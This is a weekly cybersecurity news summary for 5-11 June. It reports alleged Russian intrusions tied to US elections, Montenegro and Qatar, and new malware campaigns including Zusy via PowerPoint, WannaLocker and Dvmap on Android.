Cyber security weekly summary 5 - 11 June

The covered week brought mainly new cases of alleged Russian cyber attacks and several instances of new malware campaigns.

Perhaps most important event of the covered week is the publication of internal NSA report, documenting Russian cyber activities against U.S presidential votes. According to the document, dated to May 5, 2017, the hackers from Russian military intelligence service GRU have penetrated the systems of one of the suppliers of hardware and software solutions for US presidential votes. The data obtained through the operation were subsequently used for phishing campaign against the local government organizations. The report does not state, to which extent were the attacks successful and whether or not have influenced the elections.

In the connection with the case, authorities have apprehended NSA contractor Reality Leigh Winner who had been identified as a source of the leak.

On June 6 Security company FireEye presented new information, concerning cyber attacks against Montenegrin government, which took place during 2017. The researchers are assuming that the spear-phishing campaign is work of Russian APT28 which is supposedly connected with local intelligence services. The attribution of the attacks is based on the presence of a specific malware, which is a hallmark of said APT and the fact, that the same infrastructure was used during the previous campaigns against NATO members. According to the experts, the attacks were related to the planned Montenegrin accede to the NATO, which was completed on June 5.

Aside from the Montenegrin case, the Russian hackers are also blamed for the hack of Qatar's official news agency's website, to which was subsequently added a crafted story about country's good relations with Iran, Israel, and the U.S. The act, ascribed to the Russian federation by FBI team which is helping to the local authorities with the investigation is as one of the contributing factors of the subsequent diplomatic clash between Qatar and neighbouring countries led by Saudi Arabia and the United Arab Emirates.

Researchers at Security firm SentinelOne have discovered the new technique of spreading of the bank trojan malware Zusy (also known as Tinba), via attached power point files. The delivery is not based on macros as is common at Microsoft Office based infections. Instead, a hyperling in the document attempts to trigger the PowerShell code, which downloads the virus.

The specialists from Chinese based firm Qihoo 360 described Malware, referred as WannaLocker which is targeting Chinese Android users. The ransomware is similar to infamous WannaCry, but uses more advanced encryption, which is applied on selected files. Instead of Bitcoin and other similar means, the authors of the virus are demanding payment in actual currency, which is rather uncommon as such transfers can be tracked more easily.

Adroid users were also targeted by a new malware, hiding in the application named Colorblok. The application, discovered by Kaspersky Lab contents an unique trojan. The malware, titled DVmap, is designed to support 64-bit version of Android. This tool, which is supposedly only on it's testing phase, not only installs its modules, but is also able to change system libraries.

About author: Roman Šulc


Tento web používá k analýze návštěvnosti soubory cookie. Používáním tohoto webu s tím souhlasíte. Další informace